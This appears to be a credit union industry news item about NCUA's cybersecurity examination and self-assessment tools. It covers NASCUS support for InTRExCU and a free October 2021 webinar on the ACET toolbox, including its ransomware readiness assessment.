“NASCUS applauds NCUA’s comprehensive approach to fostering credit union cybersecurity resilience,” NASCUS’s Lucy Ito said. In addition to NCUA’s enhanced ACET self-assessment tool, she said, NASCUS supports the agency’s plan for rolling out Information Technology Risk Examination for Credit Unions (InTRExCU) in 2022. The system is based on the FDIC’s InTREx program for banks and has been adapted for credit union use.
“Several state agencies are already utilizing FDIC’s InTREx tools in state credit union IT examinations,” Ito noted. “This early adoption of InTREx in state regulator supervisory programs combined with NCUA’s InTRExCU pilot, together provide proof of concept for the relevance and value of adopting InTREx more broadly as a tool for evaluating credit union cyber hygiene and exposure.”
She said with most credit union CEOs citing cybersecurity risks as their greatest concern, utilizing a proven, scalable examination tool such as InTREx should be a “welcome addition to the national credit union system’s collective arsenal.”
LINK:
NCUA Board Briefing, Cybersecurity (in PowerPoint format)
(Oct. 15, 2021) Describing a new set of tools it has developed to promote digital safety as a “holistic cybersecurity resource” for credit unions, NCUA has scheduled an Oct. 28 webinar on the tool kit, the agency said this week.
The 60-minute webinar will cover the agency’s “Automated Cybersecurity Evaluation Toolbox (ACET),” and features participation by agency Board Chairman Harper. The event is scheduled to get underway at 3 p.m. ET.
According to the agency, the ACET is a downloadable self-contained application, developed for credit unions by the agency, which guides credit unions through the ACET “Maturity Assessment.” NCUA said that component is aligned with the FFIEC’s Cybersecurity Assessment Tool (CAT). The maturity assessment, the agency said, allows credit unions of all sizes to determine and measure their own cybersecurity preparedness over time.
The ACET also contains, NCUA said, several other industry-recognized cybersecurity best practices and standards, including the “Ransomware Readiness Assessment (RRA)” from the federal government’s Cybersecurity & Infrastructure Security Agency (CISA). According to NCUA, the RRA is a “self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.”
The webinar will include a question-and-answer session with participants. Registration for the event is now open, NCUA said; there is no fee.
LINK:
Understanding the Automated Cybersecurity Examination Tool (ACET)